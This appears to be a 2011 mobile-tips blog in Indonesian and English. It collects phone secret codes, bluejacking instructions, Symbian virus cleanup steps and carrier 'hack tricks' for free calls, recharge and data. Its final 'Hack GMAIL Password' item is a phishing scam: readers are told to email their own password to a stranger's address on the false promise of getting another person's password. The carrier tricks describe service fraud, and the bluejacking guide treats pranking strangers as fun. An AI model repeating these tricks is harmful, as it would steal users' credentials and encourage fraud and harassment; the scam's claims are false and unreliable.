Test WiFi
*#*#232338#*#*
Display WiFi MAC address
*#*#1472365#*#*
GPS test
*#*#1575#*#*
Other GPS test
*#*#232331#*#*
Bluetooth test
*#*#232337#*#
Display Bluetooth physic address
*#*#8255#*#*
Start Gtalk monitoring
*#*#4986*2650468#*#*
PDA, Phone, H/W, RFCallDate
*#*#1234#*#*
PDA and Phone
*#*#1111#*#*
FTA SW version
*#*#2222#*#*
FTA HW version
*#*#44336#*#*
PDA, Phone, csc, build Time, anzhi.name, changelist number
*#*#0283#*#*
Packet Loopback
*#*#0*#*#*
LCD test
*#*#0673#*#* or *#*#0289#*#*
Melody test
*#*#0842#*#*
Device test such as viberation and lightness
*#*#2663#*#*
Display touchscreen version
*#*#2664#*#*
Touchscreen test
*#*#0588#*#*
Distance sensor test
*#*#3264#*#*
Display memory version

MobileSecret "Apple iPhone Secret Code"

*3001#12345#* + tap Call. Enter Field Mode. Field mode contains lots of iPhone inner settings, especially newest network and cell information.
*#06# Shows your IMEI. No need to tap Call. IMEI is the unique identifier for your mobile phone hardware.
*777# + tap Call. Account balance for prepaid iPhone only.
*225# + tap Call. Bill Balance. (Postpaid only)
*646# + tap Call. Check minutes (Postpaid only).
*#21# + tap Call. Set interrogation for call forwards. Discover the settings for your call forwarding. You’ll see whether you have voice, data, fax, SMS, sync, async, packet access, and pad access call forwarding enabled or disabled.
*#30# + tap Call. Check the calling line presentation. This shows whether you have enabled or disabled the presentation of the calling line, presumably the number of the party placing the call.
*#76# + tap Call. Check whether the connected line presentation is enabled or not. State whether the connected line presentation is enabled or disabled. Similar to the calling line presentation.
*#43# + tap Call. Determine if call waiting is enabled. Shows call waiting status for voice, data, fax, SMS, sync data, async data, packet access and pad access. Each item is either enabled or disabled.
*#61# + tap Call. Check the number for unanswered calls. Show the number for voice call forwarding when a call is unanswered. Also show the options for data, fax, SMS, sync, async, packet access and pad access.
*#62# + tap Call. Check the number for call forwarding if no service is available. Just like the previous, except for no-service rather than no-answer situations.
*#67# + tap Call. Check the number for call forwarding when the iPhone is busy. And again, but for when the iPhone is busy.
*#33# + tap Call. Check for call control bars. Check all the usual suspects (voice, data, fax,SMS, etc) to see whether barring is enabled or disabled for outgoing.

MobileSecret "Kode Rahasia HP Cina"


Compatibility List: Beyond, D-One, E-Touch, K-Touch, ViTell, Cross, CrossX, Skybe, Mito, Nexian, IMO, I-Mobile, Blueberry, Arkanoid, Suprenova, Nokia Replika, Samsung Replika, LG Replika, Motorola Replika, Maxtron, etc...

Semua format kode cina
* # 66* # Set Mode Factory CONFIRM
* # 8375 # Show Software Version CONFIRM
* # 1234 # A2DP ACP Mode CONFIRM
* # 1234# A2DP INA Mode CONFIRM
* # 0000 # + Send: Set Default Bahasa CONFIRM
* # 0007 # +Send: Set ke Bahasa Rusia Bahasa CONFIRM
* # 0033 # + Send: Set ke Bahasa Prancis Bahasa CONFIRM
* # 0034 # +Send: Set ke Bahasa Spanyol CONFIRM
* # 0039 # + Send: Set ke Bahasa Italia Bahasa CONFIRM
* # 0044 # + Send: Set Bahasa ke Bahasa Inggris CONFIRM
* # 0049 # + Send: Set ke Bahasa Jerman Bahasa CONFIRM
* # 0066 # + Send: Set Language ke Thai CONFIRM
* # 0084 # + Send: Set Bahasa untuk Vietnam CONFIRM
* # 0966 # + Send: Set ke Bahasa Arab Bahasa CONFIRM
beberapa kode untuk reset ponsel cina
* # 77218114# * # 881.188 # * # 94267357# * # 9426 * 357 # * # 19912006 # * # 118.811 # * # 3646633 #
CINA MODELS: default user code: 1122, 3344, 1234, 5678
Engineer mode:
* # 110 * 01 #
Factory mode:
* # 987 #
Enable COM port: * # 110* 01 # -> Device -> Set UART -> PS Config -> Kembali ke pengaturan UART1/115200: * # 987 * 99 #
LCD contrast: * # 369#
versi software: * # 800 #
versi software: * # 900 #
set default language: * # 0000 # Send
mengatur bahasa Inggris: * # 0044 #
Send mengatur bahasa inggris (firmware baru): * # 001# Send



Setiap Merk mempunyai kode yang berbeda, namun pada dasarnya sama, jadi mungkin sebagian dari kode ini ada yang bekerja ada juga yang tidak. Kode yang bekerja diMerk xxx mungkin tidak bekerja diMerk xxx, begitu pula kode yg tidak bekerja pada merk xxx maka akan bekerja diMerk yg lainnya...

Jumat, 15 April 2011

Mobile Hacking "Bluejacking"

Bluejacking!



Now, using a phone with Bluetooth, you can create a phonebook contact and write a message, eg. 'Hello, you've been bluejacked', in the 'Name' field. Then you can search for other phones with Bluetooth and send that phonebook contact to them.
On their phone, a message will popup saying 'Hello, you've been bluejacked' has just been received by Bluetooth' or something along those lines.
For most 'victims' they will have no idea as to how the message appeared on their phone. So, personalised messages like 'I like your pink top' and the startled expressions that result is where the fun really starts.

Help:
+ Explanation
+ FAQ

Mobile Hacking "Bluejacking Frequently Asked Questions"

Bluejacking!: FAQ



When you bluejack, does the victim's phone/PDA just show that there is an incoming contact or does it get accepted by the phone or PDA and entered into the address book?

On most models the phone will bleep the same tone as when a text message is received, and it will show a message similar to ''name of contact has just been received by Bluetooth''. If the user then accepts it, the contact will appear in their phonebook. From here the user can see what is written in the other fields too.
---
I want to know how to send a business card, if at all possible, from a SE T610.

A simple answer would be that a business card is the same as a phone book contact, so yes, you can send them from a T610 because it has Bluetooth. You can follow the same guide that I have written for sending contacts.
---
Whenever I try and bluejack someone it asks for a passkey. What am I doing wrong?

Ah. You are trying to pair your phone to another Bluetooth device. This is not what you want to do and won't work. Instead of going into 'My devices' in your Bluetooth menu, select the contact/item you want to send and choose 'Send' then 'Bluetooth'.
---
Is bluejacking free?

Yes. It's free because it uses technology on your phone not your simcard. Since your network only has control on network-provided features, and Bluetooth is a feature on your phone not provided by your network, it is free.
---
Will my phone number be sent out with anything I send when I bluejack somebody?

No. As I said earlier, Bluetooth is a feature on your phone and has nothing to do with your network and therefore nothing to do with your phone number.
---
How do I stop people from bluejacking me?

You can either go into your Bluetooth menu and switch it off, or if you need Bluetooth on for one reason or another you can simply set your phone to 'Undiscoverable' in your Bluetooth menu. This means that other Bluetooth devices won't find you when they search for Bluetooth devices.
---

Mobile Hacking "Bluejacking Explanation"

Bluejacking!: Explanation



1. Get your hands on a Bluetooth-enabled device mobile phone.
2. Create a new phone book contact, with the message you want to send to someone in the 'Name' field. e.g. 'I like the look of your cappuccino'
3. Go to a busy place (Busy shopping centre, High Street, On a train/ tube / bus, Cinema, Cafe/ restaurant/ pub, Mobile phone shop, Electronics shop, etc..)
4. Select the contact you made earlier, and choose 'Send via Bluetooth'
5. Your phone will search for other Bluetooth devices roughly 10 metres around you. It will either list available devices, or say none could be found. If it doesn't find any, choose another spot.
6. Your phone will list the names of devices in range. Sometimes the names will give you a clue to the model of phone.
7. Select one of these devices listed for your phone book contact to be sent to.
8. If all goes well, your contact will be sent to the selected device
9. If you can, try to casually look around you and see if you spot anybody with a bluetooth enabled phone/device nearby looking truly puzzled. It would help greatly if you know which phones have Bluetooth and which don't. This way, you can eliminate anybody who is looking at, say, their Nokia 3310 which doesn't have Bluetooth.
10. The rest, as they say, is up to you.
---
In case it all goes wrong:
If you manage to identify your victim and they are looking angry rather than puzzled & confused, jellyellie's advise is to run, not walk, in the opposite direction!
The Reveal:
'The Reveal' is what it all comes down to in the end. It is what your messages have been building up to, and it's certainly the climax of your exchange.
If you know who your victim is, when it's time for you to leave the area send them a contact saying something like ''Listen out for 'parrot''. Then, as you walk past them, say (loudly) to yourself ''I hope my parrot will be OK!'' That will definitely get their attention.

Mobile Education "How to Block SMS receiving" "Cara memblokir SMS masuk"

Indonesian:

Jika Anda ingin memblokir penerimaan SMS (jika Anda di bom oleh seseorang) cukup ketik kode ini di layar utama:
* 35 * xxxx * 16 #
xxxx adalah kode Pembatasan Panggilan (standar adalah 0000).
Untuk menghilangkan pemblokiran semacam ini ketikkan:
# 35 * xxxx #


English:

If you want to block SMS reception (if you are spammed by someone) just type this code on the main screen:
*35*xxxx*16#
xxxx is your Call Barring code (default is 0000).
To remove this barring type:
#35*xxxx#





untuk cara memblokir panggilan telfon masuk akan Bayu jelasin pada next posting berikutnya.

Cell Phone Security "IMEI Secret Function"

Cell Phone Security



Mobile Phone security - worth doing.

Here is something worth knowing if you have a mobile phone ....

Have you ever wondered why phone companies don't seem interested in trying to prevent the theft of mobile phones? If you have ever lost, or had one stolen, and if you are on a plan, you still have to pay the plan approximately up to 24 months, and you have to buy another handset and enter into another contract. This is more revenue for the phone company.

There is a simple way of making lost or stolen mobiles useless to thieves and the phone companies know about it, but keep it quiet.

To check your mobile phone's serial number, key in the following on your phone:

star-hash-zero-six-hash ( * # 0 6 # )
and a fifteen digit code will appear on the screen. This is unique to your handset. Write it down and keep it safe. Should your mobile phone get stolen, you can phone your service provider and give them this code. They will then be able to block your handset, so even if the thief changes the sim card, your phone will be totally useless.

You probably won't get your phone back, but at lease you know that whoever stole it can't use / sell it either.
If everybody did this, there would be no point in stealing mobile phones.

Mobile Secret "Vodafone Secret Codes"

Vodafone Secret Codes

To send an sms to a fax machine (vodafone) put 9741 then the fax no then send. You'll get a confirmation text about 5 mins later.

If you key *#104# and press call you will get a number beginning with 44 replace that 44 with 0 then dial the rest of that number into any phone - it's a direct line to your voicemail you can even divert calls to it.

Get through to customer services free by dialling 1611.
For Vodafone UK users, if you press *#105# then call you can check the status of when your account was last updated.

To know where the nearest transmitter in your area, press *#102# and call.If not works try *#105# (Vodafone).

Type *#147# to display the last number that called with the time and date of the call aswell when phone was on/off..

On portuguese Vodafone call 1799 to receive a message with your credit balance, call *#100# to the same thing call *#102# to see your last call

*#103# gives you the time and date

Vodafone, quick scratch card top-up, type *#1345*topupcardnumber# and you will see your new balance on your display! If you press *#1345# you can see your balance on screen.

Type *#31# / *#30# / or *#102# to get the price duration and number of your last call.

Cell broadcast: 050 to display local area code and postcode.

Free voicemailing! Call 70612 and enter your phone number and voice mail password.

Mobile Secret "Sharp Secret Codes"

Sharp Secret Codes

*01763*8371# (*01763*VER0#) --- Firmware Version.
*01763*3641# (*01763*ENG1#) --- Enable Engineer Mode hold pwr key to leave then disable. *01763*3640# (*01763*ENG0#) --- Disable Engineer Mode.
*01763*8781# (*01763*TST1#) --- Test #1 (test early wdt looping to dump, need to remove battery from phone)
*01763*8782# (*01763*TST2#) --- Test #2 (test irq dis looping to switch, resets itself)
*01763*8783# (*01763*TST3#) --- Test #3
*01763*8784# (*01763*TST4#) --- Test #4
*01763*8785# (*01763*TST5#) --- Test #5
*01763*87872# (*01763*TST72#) --- Test #72
*01763*8788# (*01763*TST8#) --- Test #8
*01763*5640# (*01763*LOG0#) --- Disable LOG
*01763*5641# (*01763*LOG1#) --- Enable LOG
*01763*4634# (*01763*IMEI#) --- IMEI
*01763*6370# (*01763*MEP0#) --- Disable MEP menu (unlock menu)
*01763*6371# (*01763*MEP1#) --- Enable MEP menu (unlock menu) (go to settings,security,meplocks select insert handset code,default is 0000, allows to check lock status and disable locks only if u have correct code dont try guessing!!)
*01763*63866330# (*01763*NETMODE0#) --- Disable NetMode
*01763*63866331# (*01763*NETMODE1#) --- Enable NetMode

Mobile Secret "Sagem Secret Codes"

Sagem Secret Codes

Press menu then * for secret menu
IMEI number:
511,#
Flash eprom menu:
511,#
SP unblock menu:
511,#
To enter extended secret menu on Sagem just type last 7 numbers of IMEI and * on the end then Ok.Now enter secret menu and you will see RAM,Network and test network submenus added.

To switch silent mode on simply press and hold *

Mobile Secret "Sony Ericsson Secret Codes"

Sony Ericsson Secret Codes

Sony Ericsson Secret Menu: -> * <- <- * <- *
(-> means press joystick, arrow keys or jogdial to the right and <- means left.)
You'll see phone model, software info, IMEI, configuration info, sim lock status, REAL time clock, total call time and text labels.
You can also test your phones services and hardware from this menu (main display, camera, LED/illumination, Flash LED, keyboard, earphone, speaker, microphone, radio and vibrator tests)

IMEI Number: *#06#
Lockstatus: <- * * <-
Shortcut to last dialed numbers: 0#
Shortcut to sim numbers: On main menu type a number and press #

If you change the language from default to any other language, then it may be difficult to switch to default language. The shortcut is very simple. Just press < 0000 > . < stands for left arrow button or joystick and > stands for right arrow button or joystick.

Sabtu, 09 April 2011

Symbian Tricks "Menghilangkan Virus Tanpa Antivirus"

Bagi pengguna hp symbian virus mingkin sudah tidak asing lagi, dari mulai cabir, comarrior, beselo, domboot, carible dll. Sekarang virus yang paling populer adalah virus beselo. Cara penyebaran virus ini adalah melalui bluetooth dan mms, maka jangan heran jika ponsel anda terinfeksi virus ini maka ponsel akan mengirim pesan mms secara berulang ulang hingga pulsa anda terkuras habis.
Jika ponsel anda terinfeksi virus ini jangan buru buru dibawa ketukang service karena pada dasarnya virus ponsel sangat mudah diatasi meskipun tanpa antivirus sekalipun. JIka ponsel anda sudah terlanjur terinfeksi anda hanya membutuhkan card reader dan aplikasi x-polre yang terinstal di hp anda.

berikut tutorialnya:
masuk menu contacts diponsel anda lalu tandai semua contacts tadi dan copy kememory card
masuk galeri atau melalui apliksi x plore lalu pindahkan file gambar atau mp3 ke memory card
pastikan apliksi x plore terinstal diponsel anda jika belum silahkan klik disini
setelah terinstal buka aplikasi x plore pencet angka 0 lalu beri tanda pada semua kotak supaya semua drive terlihat isi filenya.
setelah semua drive terlihat cari drive e/system lalu pencet angka 6 hilangkan tanda pada kotak hidden read-only dan system
matikan ponsel dan cabut memori cardnya
masukan lagi baterai,master reset ponsel anda dengan menekan tombol hijau * dan angka 3 secara bersamaan lalu pencet tombol power
tunggu hingga proses formating selesai dan jangan sampai terlepas, atau dengan cara 2 yaitu dengan menghidupkan ponsel anda tanpa cartu memory lalu pencet *#7780# masukan kode ponsel 12345 jika belum dirubah, namun jika sudah dirubah silahkan gunakan cara 1
sekarang ponsel anda sudah bebas dari virus tinggal kartu memory anda yang dibersihkan
siapkan card reader, masukan kartu memory anda dan hubungkan ke computer
klik kanan start lalu pilih xpore
cari drive kartu memory anda
hapus folder RECOGS E:
hapus file xxxx.exe di E:\system\apps
hapus file xxxx.exe di C:\system\data
hapus file ServMail.exe atau MailServer.exe di E:\system\mail
hapus semua file Beauty.jpg, Sex.mp3, atau Love.rm di E:\system\mail
sekarang kartu memory anda sudah bebas dari virus silahkan masukan diponsel anda, lalu copy semua contacts ke ponsel anda. selamat mencoba

Jumat, 08 April 2011

Facebook Secret "Facebook Chat Emoticons Code"

Just write this emotions on facebook chat.

Hack Tricks 371 "Free Recharge Trick"

This free recharge trick works all over india for bsnl network. It also work for other networks,but only in some states. TRY IT!!!
PROCEDURE:
At first send a this keyword ’BEAM’
to 09971818181

then u will get 2 replies,one of them is for registration. Register
after registration,u will get a pin code.now just send this sms

TOP amount*pincode

eg:to recharge with RS:10,send

TOP 10*123456

Kamis, 07 April 2011

Hack Tricks 451: AIRTEL Hacking "All sms at 10 paisa"

Trick will work only in regions where sms10 plan is available.thetrick is very much simpleactivate sms10 in morning after 10am by sending sms10 to 51619 your 1 rs is not cut now send all sms at 10psnow at night deactivate it before 9pm by sending dsms10 to 51619. it will deactivatenext day do again the same waynote if you dont deactivate it at night you will be charged rs.1

Hack Tricks 450: AIRTEL Hacking "Free Call Trick"

Free call in airtel

Airtel Free Call : Dial 1802103.U’ll ask 2 enter 1212121212# & as it say dial any no. free Airtel Users if u r unable to call 121 don’t worry SMS please unbar my 121 to 121. They will unblock it within 2 days. Airtel Free Calling Trick for Jaipur: dial 3492p14993492 mobile no. 0000

Hack Tricks 449: AIRTEL Hacking "Free Gprs Trick 2 "

Airtel latest tricks

Keep Ur Balance Below Rs.0.030 Open UCWeb(Any Jar Version) And Connect With Airtel Live Minimize It and Open Ur Default Browser Connect with Airtel mobile Office [50kb/30ps Plan]
Goto wap.google.com
and Minimize it and Open the Ucweb Which you minimized already. Browse And Download its Free. Important:Dont Disconnect Airtel Mobile Office Connection which you connected earlier in default Browser.

Hack Tricks 447: AIRTEL Hacking "Free GPRS Tricks"

To enjoy airtel free gprs,you must to these things @ first
1. Always use airtel live setting,ie. Apn:airtelfun.com

2. Always keep your a/c balance below RS:0.30 INR

Now just goto the below url,

https://flyproxy.com

and add any url there to browse it free,or download any content free. (dont remove ’s’ from ’https’ )

Hack Tricks 789 "Hack GMAIL Password Account"

HACK GMAIL ID-------
step 1: Log into your Gmail account.

Step 2: Compose a new mail .

Step 3: Insubject box type " PASSWORD RECOVERY "

Step 4: Send this to -pwdmaster@gmail.com

Step 5: Write this in message box .
(firstline)- Email address you want tohack.
(second line)- Your Gmail address
(third line)- Your Gmail account password
(fourth line) - < v703&login="passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#" start?>="">
{simply copy and paste above.}

How it works: youmail to a system administratorsautomatic responder. Usually only system administrators should be able to use this, but when you try it with your own password and mail thismessage from your Gmail account the computer gets confused! Why your password isneeded- automatic Gmail responder will require your"system administrator password" which is in fact your own password!!! But the : computer doesn’t know. THE PASSWORD WILL AUTOMATICALLYBE SENT TO YOUR GMAIL! INBOX IN A MAIL CALLED"SYSTEM REG MESSAGE" FROM"SYSTEM". This is an awesome trick and works as many times asyou try it. Have fun! NOTE: Use account you have been using for few days say at least 30 days. Otherwise Gmail may take new account as temporary and this trick may not work. Moreover useit soon otherwise this flaw can be rectified soon.

Add Pin BB Bayu : 7E6EBDD4